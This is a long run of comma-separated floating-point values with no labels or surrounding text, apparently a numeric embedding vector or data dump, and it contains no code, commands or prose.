0.0036557423882186413, 0.007734958548098803, 0.006438303738832474, 0.0007954190950840712, 0.003378423163667321, 0.0012732326285913587, -0.043621569871902466, 0.007498862687498331, -0.026742570102214813, -0.02632284350693226, -0.017388666048645973, 0.002115496201440692, 0.019832074642181396, -0.012007174082100391, -0.006490769796073437, 0.014592989347875118, -0.0060260724276304245, 0.005077940411865711, -0.01180480606853962, -0.008836740627884865, 0.011175216175615788, -0.010897897183895111, -0.005261570680886507, 0.034927234053611755, -0.01206713542342186, 0.006633176933974028, -0.05984099954366684, -0.04143299534916878, 0.02921595796942711, -0.00263265916146338, -0.024419084191322327, -0.04185272380709648, -0.004493321292102337, 0.009893551468849182, 0.03147948160767555, 0.0028799979481846094, -0.03198914974927902, -0.00162643997464329, -0.005628831218928099, -0.01521508302539587, -0.01402335986495018, 0.009638718329370022, 0.0016704737208783627, -0.028526408597826958, 0.0023440972436219454, 0.019637200981378555, -0.005250328220427036, -0.006022324785590172, 0.008634372614324093, 0.012029659934341908, 0.0005686918739229441, -0.019787102937698364, -0.02411928027868271, -0.017883343622088432, -0.001768847112543881, -0.024434074759483337, 0.03267870098352432, -0.015844672918319702, 0.056753009557724, 0.01770346239209175, 0.01198468916118145, -0.005681297276169062, 0.03132957965135574, 0.022485345602035522, -0.01581469178199768, -0.024224212393164635, 0.0009026929037645459, 0.013048995286226273, 0.013850972056388855, 0.0012188930995762348, -0.02414926141500473, -0.006101023405790329, 0.026277873665094376, 0.018752777948975563, -0.004245982505381107, -0.007382688112556934, 0.00031245261197909713, 0.00045368866994977, -0.023369768634438515, -0.0029868034180253744, 0.026997404173016548, 0.02074647881090641, 0.015177607536315918, -0.01765849068760872, 0.04251229390501976, 0.003552684560418129, -0.027057364583015442, -0.03062503971159458, -0.029335880652070045, -0.017748432233929634, -0.008889206685125828, -0.02212557941675186, -0.01717880368232727, -0.026068009436130524, 0.04425115883350372, -0.017088862136006355, -0.0005813398747704923, 0.002049913862720132, 0.010193356312811375, 0.0014915278879925609, 0.0326487198472023, -0.01989203505218029, -0.021645892411470413, 0.0006047621136531234, 0.007757443934679031, -0.049887485802173615, 0.016084516420960426, -0.034777332097291946, -0.031059756875038147, -0.003196666482836008, -0.020296771079301834, 0.01713383197784424, 0.05969109758734703, 0.029995450749993324, 0.05834197625517845, -0.026757560670375824, -0.027462100610136986, 0.008754294365644455, -0.0015168238896876574, 0.010867916978895664, -0.022530315443873405, 0.013641109690070152, -0.006472031585872173, -0.0222455020993948, -0.0027638236060738564, 0.005640074145048857, 0.027986759319901466, -0.0018072596285492182, -0.014892793260514736, -0.0019187494181096554, 0.0038824696093797684, 0.03276864439249039, -0.03807518258690834, 0.01630936935544014, -0.02428417280316353, -0.006093528587371111, -0.03285858407616615, -0.05996092036366463, -0.0405036024749279, -0.014113301411271095, -0.020806439220905304, 0.009481320157647133, -0.01783837378025055, -0.016579193994402885, -0.0024452812504023314, 0.011242672801017761, 0.015424946323037148, -0.01833305135369301, 0.035257019102573395, -0.014930268749594688, -0.004553282167762518, 0.014907783828675747, -0.006584458518773317, 0.0016142603708431125, 0.011070284992456436, -0.011182711459696293, 0.013618623837828636, 0.0024227958638221025, 0.029710635542869568, -0.0009846707107499242, -0.002458397764712572, -0.005317783914506435, 0.025408439338207245, 0.014345650561153889, 0.024359123781323433, 0.0007532590534538031, 0.00831957720220089, 0.022905072197318077, 0.04661961644887924, 0.006419565994292498, 0.0006595700979232788, 0.022740179672837257, 0.00851445086300373, -0.0116399135440588, -0.023564642295241356, 0.01732870563864708, -0.011759835295379162, -0.013708565384149551, -0.014255709014832973, 0.0297556072473526, 0.009084079414606094, -0.051416490226984024, -0.023714544251561165, 0.00027966147172264755, 0.005209105089306831, 0.010470675304532051, 0.01010341476649046, 0.0062996442429721355, 0.007030417677015066, -0.0014887172728776932, -0.012689230032265186, 0.04775887355208397, 0.006580710876733065, -0.02074647881090641, -0.0012254513567313552, 0.0009101880132220685, -0.0035695484839379787, 0.01885771006345749, -0.00534776458516717, -0.021480999886989594, -0.031149698421359062, 0.007588803768157959, -0.023204876109957695, -0.01342375110834837, -0.038824696093797684, 0.00531403673812747, 0.018408002331852913, -0.0012863491429015994, 0.008904196321964264, 0.007536338176578283, 0.005340269301086664, -0.018482953310012817, -0.020011957734823227, 0.019247455522418022, -0.033578116446733475, 0.02143602818250656, -0.004688194487243891, -0.025243546813726425, -0.016938960179686546, -0.0011598690180107951, -0.024913761764764786, 0.0024790093302726746, 0.0030467642936855555, -0.04536043480038643, 0.025303509086370468, -0.00675309868529439, -0.026068009436130524, 0.02160092070698738, -0.022380413487553596, -0.03129959851503372, -0.019487299025058746, -0.017253754660487175, -0.03966414928436279, -0.028166642412543297, 0.006089780945330858, 0.029815567657351494, 0.047668930143117905, 0.01786835491657257, -0.005216599907726049, -0.0016807795036584139, -0.01478036679327488, 0.004092332907021046, -0.01342375110834837, 0.0033596851862967014, 0.0018007013713940978, 0.019667182117700577, 0.01668412610888481, 0.01852792501449585, 0.00505170738324523, -0.02058158628642559, -0.004564525093883276, -0.0068655251525342464, -0.004594505298882723, -0.004219749942421913, -0.005999839399009943, 0.028166642412543297, -0.004669456742703915, 0.008004782721400261, 0.023249845951795578, -0.013273848220705986, 0.00987106654793024, -0.014180758036673069, -0.005032969638705254, -0.017208784818649292, -0.0055501325987279415, -0.0042234971188008785, 0.00003747557639144361, -0.002023681066930294, -0.009323922917246819, -0.013850972056388855, 0.015342500060796738, -0.003108598990365863, 0.023849455639719963, -0.02957572415471077, 0.00539648300036788, -0.018078217282891273, 0.013686079531908035, 0.011010323651134968, -0.02008690871298313, -0.009706174023449421, 0.0001960441004484892, -0.03549686446785927, 0.03453749045729637, 0.0017107599414885044, -0.008379538543522358, 0.0026214164681732655, -0.023219866678118706, -0.01650424301624298, 0.018273090943694115, 0.03345819190144539, -0.002306621754541993, 0.03468739241361618, 0.018063226714730263, 0.022575287148356438, -0.000993102788925171, -0.027267228811979294, -0.012262008152902126, 0.006636924110352993, 0.011774825863540173, 0.0024284173268824816, 0.01783837378025055, -0.02584315650165081, -0.00942135974764824, 0.01630936935544014, -0.013228878378868103, 0.023010002449154854, -0.0032772389240562916, 0.001792269409634173, 0.014315669424831867, -0.004028624389320612, 0.01920248381793499, 0.03444754704833031, -0.018318060785531998, 0.013273848220705986, -0.030040420591831207, -0.016699116677045822, 0.01972714252769947, 0.028286563232541084, -0.02618793211877346, 0.016204439103603363, -0.00867934338748455, 0.030685000121593475, -0.01180480606853962, 0.0027038627304136753, -0.012269503436982632, -0.0008118146215565503, 0.0111227510496974, 0.005475181620568037, 0.023189885541796684, 0.019592231139540672, 0.010163376107811928, 0.01436813548207283, -0.0058199567720294, -0.03480731323361397, 0.0032041617669165134, 0.00629214895889163, 0.010343258269131184, 0.0008263364434242249, 0.03345819190144539, -0.0045495349913835526, -0.004178526811301708, 0.009211496450006962, 0.017763422802090645, 0.021870745345950127, -0.0018512933747842908, -0.009301437996327877, -0.027791885659098625, -0.029680656269192696, 0.01188725233078003, -0.03183924779295921, 0.0010436947923153639, 0.0010080930078402162, 0.004804368596524, -0.024583976715803146, 0.00325287994928658, -0.0377453975379467, -0.019082562997937202, -0.011549971997737885, 0.01936737634241581, -0.005827452056109905, -0.004620738327503204, 0.007026670500636101, -0.008806760422885418, -0.03132957965135574, 0.02467391826212406, 0.03462743014097214, 0.005906150676310062, 0.007393931038677692, -0.003979905974119902, -0.00534776458516717, 0.027312198653817177, -0.018947651609778404, 0.04619988799095154, -0.012127095833420753, 0.008731808513402939, -0.0035920338705182076, -0.009766134433448315, 0.03537694364786148, 0.033398233354091644, 0.033098429441452026, -0.0028012993279844522, -0.02840648591518402, 0.0008713071001693606, 0.010598092339932919, 0.008776779286563396, -0.004245982505381107, -0.008619382046163082, -0.008611886762082577, 0.006981699727475643, 0.03093983419239521, 0.004665709100663662, 0.007408921141177416, 0.0030505117028951645, -0.01971215195953846, -0.02298002317547798, 0.010688033886253834, -0.0008296155137941241, 0.005598851013928652, 0.01768847182393074, -0.00518287206068635, -0.0011223935289308429, 0.04251229390501976, 0.0072927470318973064, -0.07141345739364624, -0.01650424301624298, -0.021151214838027954, -0.009908542037010193, 0.00866435281932354, 0.006528245285153389, -0.014990230090916157, 0.01196969859302044, 0.030460147187113762, -0.02446405589580536, -0.010073434561491013, 0.00866435281932354, -0.012659248895943165, -0.019097553566098213, 0.02515360526740551, -0.005280308425426483, -0.008357053622603416, 0.017898334190249443, -0.025303509086370468, 0.004126060754060745, -0.008799265138804913, -0.01969716139137745, 0.022065619006752968, 0.0043359240517020226, 0.02056659571826458, -0.02191571705043316, -0.022740179672837257, -0.017073871567845345, -0.010747995227575302, 0.003931188024580479, -0.005254075396806002, -0.0012001552386209369, -0.0026888723950833082, 0.010470675304532051, 0.006307139061391354, -0.011347603984177113, -0.008004782721400261, 0.0017875849734991789, -0.026997404173016548, 0.0029399588238447905, 0.015320015139877796, -0.022005656734108925, -0.007809909991919994, -0.018318060785531998, 0.011512496508657932, 0.024089299142360687, -0.010920382104814053, -0.00012495761620812118, 0.002263524802401662, 0.02464393898844719, -0.0018887689802795649, -0.0007841764017939568, 0.008814254775643349, -0.01854291372001171, 0.02378949522972107, -0.0007481061620637774, -0.0014652949757874012, -0.008364547975361347, 0.014930268749594688, 0.021690862253308296, -0.01401586551219225, -0.010605587624013424, 0.006513254716992378, -0.020776458084583282, 0.004459593445062637, 0.03225897625088692, -0.01080046035349369, -0.009248971939086914, -0.00653948774561286, 0.002197942463681102, 0.0038637318648397923, -0.018647845834493637, -0.027941789478063583, 0.014473066665232182, -0.03915448114275932, -0.014495552517473698, -0.006314634345471859, -0.016204439103603363, -0.00028153526363894343, -0.006280906498432159, 0.026472745463252068, 0.003279112745076418, 0.024224212393164635, 0.001885021454654634, 0.011422554962337017, -0.011010323651134968, 0.007794919423758984, -0.002956822980195284, 0.019082562997937202, 0.003404655959457159, -0.003256627358496189, 0.018408002331852913, 0.015694770961999893, 0.009743649512529373, -0.00471067987382412, -0.002257903339341283, 0.012786665931344032, -0.03549686446785927, 0.026262883096933365, -0.015185102820396423, -0.003957420587539673, 0.02209559828042984, 0.0035395680461078882, 0.010080929845571518, -0.008177170529961586, 0.0016526728868484497, 0.008454489521682262, -0.009368893690407276, -0.00047734513645991683, -0.0035264515317976475, -0.020131878554821014, -0.015919623896479607, 0.0013622371479868889, -0.009586252272129059, 0.015222578309476376, 0.019592231139540672, -0.035766687244176865, 0.014765376225113869, 0.005730015225708485, -0.030849892646074295, -0.013925923965871334, -0.02737215906381607, 0.00611601397395134, 0.00547892926260829, 0.009016623720526695, -0.003931188024580479, -0.015439936891198158, 0.030505118891596794, -0.013880953192710876, -0.018557904288172722, 0.0472492054104805, -0.013236372731626034, -0.010230831801891327, 0.0036070242058485746, -0.0019178125075995922, 0.021495990455150604, 0.002503368305042386, -0.007892356254160404, -0.015267549082636833, 0.0004023939836770296, -0.0022616509813815355, -0.0015093288384377956, 0.013476217165589333, 0.017283735796809196, -0.0015346248401328921, -0.01920248381793499, -0.040533583611249924, 0.01402335986495018, 0.0123969204723835, -0.005209105089306831, -0.0008258679881691933, -0.004736912902444601, -0.011527487076818943, 0.031509462743997574, -0.01020085159689188, -0.01884271949529648, -0.027597013860940933, 0.0076749976724386215, 0.0025801933370530605, -0.0016826533246785402, -0.0003984122013207525, -0.0041223131120204926, -0.02551337145268917, 0.016923969611525536, 0.02977059595286846, 0.029650675132870674, 0.0005953931831754744, 0.010470675304532051, 0.002098632277920842, -0.0042759631760418415, 0.014892793260514736, -0.002928716130554676, -0.014682929962873459, -0.03741561248898506, 0.024449065327644348, -0.000947195163462311, 0.012456880882382393, 0.03141952306032181, -0.006235935725271702, 0.03141952306032181, 0.0031385794281959534, 0.015072676353156567, -0.03891463577747345, 0.0011645534541457891, -0.027282219380140305, -0.021840764209628105, 0.01732870563864708, 0.02037172205746174, 0.0057862289249897, 0.024449065327644348, -0.012659248895943165, 0.011092769913375378, -0.036486219614744186, -0.030685000121593475, -0.009129050187766552, 0.027641983702778816, -0.00925646722316742, 0.01377602107822895, 0.01701391115784645, -0.0273421797901392, -0.0025014947168529034, 0.009069088846445084, -0.023669572547078133, -0.021121233701705933, 0.01026830729097128, 0.0052878037095069885, 0.022665226832032204, -0.00856691598892212, 0.005696287378668785, 0.027821866795420647, -0.00003235195981687866, -0.025228556245565414, 0.04167284071445465, 0.01358864363282919, -0.01046318095177412, 0.004602000582963228, 0.02482382021844387, -0.025108635425567627, -0.009676193818449974, -0.006393332965672016, 0.003153569530695677, -0.027072355151176453, -0.003946178127080202, 0.018273090943694115, 0.010013473220169544, 0.007420164067298174, 0.034597449004650116, -0.014675435610115528, 0.018662836402654648, 0.0020311761181801558, 0.007877365685999393, -0.02534847892820835, 0.003533946815878153, 0.01816815882921219, 0.03984403237700462, -0.017058880999684334, 0.012014669366180897, 0.009286447428166866, -0.006397080607712269, -0.0020161860156804323, -0.007330222520977259, 0.03861483186483383, -0.0009153409046120942, 0.015484907664358616, -0.012389425188302994, 0.012029659934341908, -0.0116399135440588, -0.010673043318092823, -0.01394091360270977, 0.004096080549061298, -0.007884860970079899, -0.011767330579459667, 0.011220186948776245, -0.011347603984177113, 0.021870745345950127, -0.02280014008283615, -0.016534224152565002, 0.012974044308066368, -0.023069964721798897, 0.0067156231962144375, -0.02807670086622238, 0.015739740803837776, 0.014315669424831867, 0.011692379601299763, 0.006738108582794666, 0.027237247675657272, 0.01579970307648182, 0.012366939336061478, -0.005463938694447279, 0.00007255037053255364, 0.007442648988217115, -0.017283735796809196, 0.021151214838027954, 0.009076584130525589, -0.011962203308939934, -0.013378780335187912, -0.009826095774769783, -0.007772434037178755, -0.010073434561491013, 0.0038449938874691725, -0.0049730087630450726, 0.013348800130188465, -0.014210738241672516, 0.01819813996553421, 0.0045907581225037575, 0.001395028317347169, 0.007363950368016958, 0.00395367294549942, -0.003496471093967557, -0.002093010814860463, 0.007892356254160404, -0.004212254658341408, 0.004433360416442156, 0.015724752098321915, -0.010140890255570412, 0.01974213309586048, 0.00246776663698256, -0.019667182117700577, 0.021451018750667572, -0.002627037698403001, 0.001935613458044827, -0.01018586102873087, -0.02139105834066868, 0.03312840685248375, -0.011092769913375378, 0.02089638076722622, -0.000013028618013777304, 0.0017576044192537665, 0.006397080607712269, -0.024748869240283966, -0.016384322196245193, -0.00009439160203328356, 0.010410714894533157, -0.008094724267721176, -0.011100265197455883, -0.004347166512161493, -0.013558663427829742, -0.004485826473683119, 0.022575287148356438, 0.008544431068003178, 0.020311761647462845, 0.009601241908967495, 0.02091137133538723, -0.00752134807407856, -0.003681975184008479, 0.006839292589575052, 0.022005656734108925, 0.0136710898950696, 0.011445040814578533, 0.012441891245543957, -0.0020705254282802343, 0.025288518518209457, -0.018467962741851807, 0.003773790318518877, -0.01753856986761093, 0.016609175130724907, -0.011415060609579086, 0.025213567540049553, -0.00858190655708313, -0.014855317771434784, 0.0012863491429015994, 0.01852792501449585, -0.008132199756801128, 0.004579515196382999, 0.014525532722473145, -0.0006085096392780542, 0.025903116911649704, -0.021301116794347763, -0.0068767680786550045, 0.00094016850925982, 0.006494516972452402, -0.019487299025058746, 0.0029493276961147785, 0.005145396571606398, -0.003271617693826556, -0.0033990347292274237, -0.004928037989884615, -0.015529878437519073, -0.0035301991738379, -0.007184067741036415, 0.010860421694815159, 0.0070941261947155, -0.007442648988217115, 0.010148385539650917, -0.02260526642203331, -0.0031160940416157246, -0.01137758418917656, 0.004212254658341408, -0.009608737193048, 0.004635728430002928, -0.0051154159009456635, -0.007656259927898645, -0.033428214490413666, 0.012944063171744347, -0.012801656499505043, 0.004017381463199854, 0.01113024540245533, -0.0057037826627492905, -0.019667182117700577, -0.003071123268455267, -0.023174894973635674, -0.010388229042291641, 0.014832832850515842, 0.005044212564826012, 0.0016002070624381304, -0.02398436889052391, -0.015230073593556881, -0.0026944938581436872, 0.012621773406863213, 0.0013509944546967745, -0.020161859691143036, -0.007498862687498331, 0.011437545530498028, 0.01028329785913229, -0.0043771471828222275, -0.0003309561579953879, 0.014832832850515842, 0.010440695099532604, 0.01053063664585352, 0.0029118522070348263, 0.01719379425048828, 0.005666306708008051, -0.008469480089843273, -0.01765849068760872, 0.018408002331852913, -0.008754294365644455, 0.0010399471502751112, -0.02483881078660488, 0.0073527079075574875, 0.00658820616081357, -0.014855317771434784, 0.033218350261449814, -0.01003595907241106, 0.007772434037178755, 0.003897459711879492, -0.02209559828042984, -0.011055294424295425, -0.014577998779714108, -0.00662193400785327, 0.00884423591196537, -0.03279862180352211, -0.026817521080374718, -0.009796115569770336, 0.01737367734313011, 0.026547696441411972, -0.00917402096092701, -0.011519991792738438, -0.013363789767026901, -0.004826853983104229, -0.019832074642181396, -0.0034308889880776405, 0.002257903339341283, 0.018318060785531998, -0.009413864463567734, 0.014263204298913479, -0.02498871274292469, -0.003511461429297924, -0.013401265256106853, 0.01095785852521658, 0.03666610270738602, 0.014570503495633602, -0.023999357596039772, -0.01885771006345749, -0.0010652432683855295, -0.014847822487354279, -0.003142327070236206, 0.004826853983104229, -0.00510042579844594, 0.012884102761745453, 0.021301116794347763, -0.00573751050978899, -0.001958098728209734, -0.030130362138152122, 0.006565720774233341, 0.027612004429101944, 0.008559421636164188, -0.009826095774769783, 0.007112863939255476, -0.012209542095661163, 0.008866720832884312, -0.00552389957010746, 0.01770346239209175, -0.006265915930271149, 0.013086470775306225, 0.0222455020993948, 0.009099069982767105, 0.0103657441213727, -0.006003587041050196, 0.011789815500378609, -0.001090539270080626, -0.0007996350759640336, -0.0040023913607001305, 0.0008797391201369464, -0.019412348046898842, -0.013618623837828636, 0.019082562997937202, 0.013356294482946396, -0.014045845717191696, 0.005216599907726049, 0.00020623276941478252, -0.011280148290097713, 0.023339787498116493, 0.011609933339059353, 0.00441462267190218, 0.0231449156999588, 0.010822946205735207, 0.007809909991919994, -0.005351512227207422, -0.028346525505185127, -0.0181831493973732, -0.02038671262562275, -0.0007794919656589627, 0.027477091178297997, 0.003237889613956213, 0.010643063113093376, 0.0008277417509816587, 0.006783078890293837, 0.005164134316146374, -0.008521946147084236, 0.00008912160410545766, 0.009316427633166313, -0.005392735358327627, 0.01683402806520462, 0.002576445695012808, 0.028466446325182915, -0.002083641942590475, -0.009803610853850842, -0.004230992402881384, -0.008709323592483997, -0.005299046169966459, -0.0181831493973732, -0.0016161341918632388, 0.010890401899814606, 0.000549954071175307, 0.018138177692890167, -0.0059661115519702435, -0.01819813996553421, 0.0012488735374063253, -0.005894907750189304, -0.0020199334248900414, -0.00510042579844594, 0.0052878037095069885, -0.004714427515864372, 0.00488681485876441, -0.0008750546840019524, 0.004976756405085325, -0.006029820069670677, -0.012434395961463451, -0.02296503260731697, -0.006273411214351654, 0.013761031441390514, -0.014982734806835651, -0.0014034602791070938, 0.005849937442690134, 0.005306541454046965, -0.00005852630783920176, 0.003496471093967557, -0.009024118073284626, 0.024539006873965263, -0.011834786273539066, -0.008671848103404045, -0.016264399513602257, -0.012884102761745453, 0.03366805613040924, -0.003071123268455267, 0.004624485969543457, -0.007660007569938898, -0.002276641083881259, 0.021331097930669785, 0.0064008282497525215, -0.04047362133860588, 0.018467962741851807, -0.016579193994402885, -0.01214958168566227, 0.029620693996548653, -0.008754294365644455, -0.023159906268119812, 0.0007443586364388466, 0.008521946147084236, -0.010523141361773014, -0.00637459522113204, -0.009106564335525036, 0.007802414707839489, 0.02564828284084797, 0.0009874814422801137, 0.013783516362309456, -0.0062284404411911964, -0.000025940124032786116, 0.0024640189949423075, 0.009031613357365131, -0.019142523407936096, -0.012202046811580658, 0.0037662952672690153, 0.033398233354091644, 0.018632855266332626, 0.00424973014742136, 0.00831957720220089, -0.010995334014296532, 0.015087666921317577, -0.008109714835882187, 0.01461547426879406, -0.023010002449154854, 0.030729971826076508, -0.011430050246417522, -0.0035957815125584602, -0.0037588002160191536, 0.010920382104814053, 0.0012638637563213706, 0.004047362133860588, -0.0073527079075574875, -0.016054537147283554, 0.0008375790785066783, -0.004287205636501312, -0.006940476596355438, 0.00557261798530817, 0.012599288485944271, 0.020131878554821014, 0.02411928027868271, 0.012247017584741116, -0.0034421314485371113, 0.0016929591074585915, -0.0035320729948580265, -0.01734369620680809, -0.016564203426241875, 0.014338155277073383, 0.02365458384156227, 0.003987401258200407, 0.010065939277410507, 0.008409518748521805, 0.00038857487379573286, -0.026097990572452545, -0.01276418101042509, 0.0016938960179686546, 0.022905072197318077, 0.007802414707839489, 0.00008361737855011597, 0.0018915795953944325, 0.02617294155061245, 0.010845431126654148, 0.006558225490152836, 0.0006820554845035076, 0.018243109807372093, -0.012202046811580658, -0.0002766165998764336, -0.012696724385023117, -0.004871824756264687, -0.004159788601100445, 0.008851731196045876, 0.0037344410084187984, 0.0004386984510347247, 0.002342223422601819, -0.009863571263849735, -0.0074126687832176685, 0.009571261703968048, -0.02002694644033909, 0.0062396833673119545, 0.011894747614860535, 0.012269503436982632, 0.03861483186483383, -0.012202046811580658, 0.022995013743638992, 0.012247017584741116, 0.00289311446249485, -0.014675435610115528, 0.0047593978233635426, -0.020146869122982025, 0.016369331628084183, 0.008574411273002625, 0.00756631838157773, -0.026952434331178665, 0.012651754543185234, 0.028271574527025223, 0.0014287562808021903, -0.004901805426925421, 0.00815468467772007, 0.005452696233987808, -0.012561812996864319, 0.0005878980737179518, 0.0006225630058906972, 0.02178080379962921, -0.006524497643113136, -0.002203563693910837, 0.0006975141586735845, -0.02058158628642559, 0.011137740686535835, 0.00429844856262207, -0.013723555952310562, -0.0009631222928874195, 0.00739018339663744, -0.019247455522418022, -0.025123625993728638, -0.006531992927193642, 0.016084516420960426, -0.004024876747280359, -0.005426463205367327, 0.017088862136006355, 0.0022054375149309635, 0.006445799022912979, -0.01734369620680809, 0.0017248133663088083, -0.014158272184431553, -0.012209542095661163, -0.02242538332939148, 0.0015215083258226514, 0.006243431009352207, 0.003593907691538334, 0.010733004659414291, 0.00841701403260231, 0.003515208838507533, 0.0009734280756674707, -0.0011982815340161324, 0.00142219802364707, 0.01888768933713436, 0.021451018750667572, 0.013393770903348923, 0.01699892058968544, -0.01956225000321865, -0.0029081045649945736, 0.009031613357365131, -0.014128291979432106, -0.005209105089306831, -0.01696893945336342, -0.02773192524909973, 0.017808392643928528, -0.023834465071558952, 0.006779331713914871, 0.016878999769687653, -0.0036332570016384125, 0.0007537275087088346, -0.0022935052402317524, -0.03504715859889984, -0.0342976450920105, -0.016084516420960426, 0.016354341059923172, -0.0023871941957622766, -0.007914841175079346, -0.007393931038677692, -0.009998483583331108, -0.021960686892271042, 0.005793723743408918, 0.003192919073626399, -0.005197862163186073, -0.032019130885601044, -0.013004024513065815, -0.004212254658341408, -0.00367822777479887, 0.024014348164200783, 0.027327189221978188, 0.011265157721936703, -0.009368893690407276, -0.0030392692424356937, -0.002417174633592367, 0.02312992513179779, 0.00009837338438956067, -0.019262446090579033, -0.013311324641108513, 0.015724752098321915, 0.005310289096087217, 0.0019655940122902393, 0.008821750059723854, -0.005055455025285482, 0.00501797953620553, 0.018647845834493637, 0.014622969552874565, -0.0020536615047603846, 0.0057112774811685085, -0.004407127387821674, 0.015140132047235966, -0.007195310201495886, -0.019442329183220863, -0.01114523597061634, -0.01719379425048828, -0.0014025233685970306, 0.012891598045825958, 0.011879757046699524, 0.019757123664021492, 0.008274607360363007, -0.0005621336167678237, -0.00024968100478872657, 0.018048236146569252, -0.001376290456391871, 0.0030186576768755913, -0.021196184679865837, -0.0015814693178981543, 0.01445058174431324, 0.0026551445480436087, 0.01698393002152443, -0.009481320157647133, 0.005220347549766302, 0.0022841363679617643, -0.017898334190249443, -0.026083000004291534, 0.014667940326035023, 0.006370847579091787, -0.005190367344766855, 0.0006937665748409927, -0.020686516538262367, -0.015589838847517967, -0.017718451097607613, -0.005797471385449171, 0.011894747614860535, 0.007847385480999947, -0.018228119239211082, 0.02088139019906521, -0.0019178125075995922, 0.00047828201786614954, -0.0041148182936012745, -0.006636924110352993, -0.009638718329370022, -0.017268745228648186, -0.005010484252125025, 0.0340278223156929, -0.02483881078660488, -0.013498702086508274, -0.028766252100467682, 0.012426900677382946, 0.007689987774938345, -0.0018728418508544564, -0.013521187007427216, -0.001842861413024366, -0.01906757242977619, 0.0019562249071896076, 0.010163376107811928, -0.0014999598497524858, -0.028841203078627586, 0.029155997559428215, -0.01665414497256279, 0.008904196321964264, 0.030115371569991112, -0.01554486807435751, -0.019622210413217545, 0.03276864439249039, 0.016294380649924278, 0.0025071159470826387, 0.009766134433448315, -0.010935372672975063, -0.014113301411271095, 0.0003906828642357141, -0.006018577143549919, -0.014600483700633049, 0.0002981650468427688, 0.011287643574178219, -0.019667182117700577, -0.0038412464782595634, -0.005422715563327074, 0.023369768634438515, 0.006685642525553703, 0.031899210065603256, 0.0031235890928655863, 0.01701391115784645, 0.0036838490050286055, 0.02278514951467514, -0.02007191814482212, 0.010897897183895111, -0.03483729436993599, -0.0013894069707021117, 0.002398436889052391, 0.008192161098122597, -0.013273848220705986, -0.018902679905295372, 0.011744845658540726, -0.008446994237601757, 0.0038000233471393585, -0.004470835905522108, 0.021211175248026848, -0.014645454473793507, 0.002231670543551445, 0.007757443934679031, 0.0030149100348353386, -0.00289311446249485, 0.0037775379605591297, 0.012366939336061478, 0.00027849036268889904, -0.012674239464104176, 0.006367100402712822, 0.0061872173100709915, -0.016084516420960426, -0.019217474386096, -0.015904633328318596, -0.003764421446248889, -0.009503806009888649, 0.015409956686198711, -0.01403835043311119, 0.006464536767452955, 0.0018466089386492968, 0.00005199736187933013, 0.02056659571826458, 0.012516842223703861, 0.013251363299787045, -0.0003555495059117675, 0.02411928027868271, 0.015754731371998787, -0.006839292589575052, -0.0075738136656582355, -0.009398873895406723, 0.008536935783922672, -0.0027057365514338017, -0.0065619731321930885, -0.0037850330118089914, 0.008079733699560165, -0.008244626224040985, 0.0023534661158919334, -0.012351949699223042, 0.004230992402881384, 0.013416255824267864, 0.008776779286563396, -0.026622649282217026, -0.01954725943505764, -0.008372043259441853, 0.002139855409041047, 0.009563766419887543, -0.005876170005649328, 0.02597806788980961, -0.022710198536515236, -0.020176850259304047, -0.012299483641982079, -0.004178526811301708, 0.02513861656188965, 0.00212486507371068, -0.009323922917246819, 0.01520758867263794, -0.009308933280408382, 0.011977193877100945, 0.008424509316682816, 0.009436349384486675, -0.01063556782901287, 0.013281343504786491, 0.014338155277073383, -0.003638878231868148, 0.003316588466987014, -0.004474583547562361, 0.024524016305804253, 0.02821161225438118, -0.014975239522755146, 0.0052878037095069885, 0.03075995109975338, 0.0032997243106365204, 0.029530752450227737, 0.013333809562027454, -0.004755650646984577, 0.004965513478964567, 0.003067375859245658, 0.014390620402991772, -0.01782338321208954, 0.004186021629720926, -0.022140569984912872, -0.015170113183557987, -0.0006455167895182967, -0.0055613755248487, -0.0004548597789835185, 0.012157076969742775, 0.0004103575483895838, -0.01071801409125328, 0.0034721121191978455, 0.0004075468750670552, 0.027327189221978188, 0.03044515661895275, 0.006048557814210653, 0.04011385515332222, 0.007854880765080452, 0.012636763975024223, 0.01699892058968544, 0.000034723463613772765, 0.00977362971752882, 0.0017679102020338178, 0.00823713093996048, -0.0020293022971600294, 0.0035264515317976475, 0.0010774227557703853, -0.0042160023003816605, -0.003811266040429473, 0.013431246392428875, 0.002265398623421788, 0.0021735832560807467, -0.02789681777358055, 0.023054974153637886, -0.013835982419550419, 0.0083345677703619, 0.0014868434518575668, -0.004703184589743614, 0.0034627430140972137, 0.01317641232162714, -0.04404129460453987, 0.006325877271592617, -0.016579193994402885, 0.005715025123208761, 0.02653270773589611, 0.009916037321090698, -0.027851847931742668, -0.010328268632292747, -0.008589401841163635, -0.014660445041954517, 0.007914841175079346, -0.011677389033138752, -0.014690425246953964, 0.01114523597061634, -0.010837935842573643, -0.01954725943505764, -0.01668412610888481, 0.0001625503064133227, -0.015282539650797844, 0.013123946264386177, 0.01369357481598854, -0.0414629764854908, 0.0013004024513065815, 0.017208784818649292, 0.003728819778189063, 0.009106564335525036, -0.008304587565362453, -0.009488815441727638, 0.0017379297642037272, 0.0049730087630450726, -0.013985884375870228, -0.010515646077692509, -0.006487022154033184, 0.00505170738324523, 0.00531403673812747, -0.016908979043364525, -0.016864009201526642, -0.004433360416442156, 0.010005978867411613, -0.02669760026037693, -0.000013101812328386586, 0.01918749511241913, 0.0068842628970742226, -0.012494356371462345, 0.018662836402654648, -0.004141050856560469, 0.027567032724618912, 0.007547580637037754, -0.0015374354552477598, -0.02669760026037693, 0.006591953802853823, 0.007056650705635548, -0.0006759656826034188, -0.0015571101102977991, -0.01987704448401928, -0.009841086342930794, -0.0005855558556504548, -0.010935372672975063, -0.01599457487463951, 0.008289596997201443, 0.0009781124535948038, -0.014525532722473145, -0.0000999543844955042, -0.0033015981316566467, 0.004680699203163385, -0.003871226916089654, -0.016908979043364525, -0.0006066358764655888, -0.0035451895091682673, 0.021136224269866943, 0.009061594493687153, 0.00246776663698256, -0.005418967921286821, -0.0017426142003387213, 0.0020517876837402582, -0.014503047801554203, 0.01633935049176216, -0.006569468416273594, -0.005726268049329519, 0.005445200949907303, -0.011744845658540726, -0.0001570460881339386, -0.0015496150590479374, -0.023249845951795578, -0.006970456801354885, -0.009743649512529373, 0.005212852265685797, 0.01869281753897667, 0.015574849210679531, -0.0030336477793753147, -0.01062807347625494, -0.02055160515010357, -0.01903759129345417, 0.006873020436614752, -0.005565122701227665, 0.009511301293969154, 0.004129808396100998, -0.01798827573657036, 0.005857432261109352, 0.005036717280745506, 0.027656974270939827, 0.007285251747816801, -0.008529440499842167, 0.02292006090283394, 0.03008539229631424, 0.013603633269667625, -0.012059640139341354, 0.007772434037178755, 0.022035637870430946, 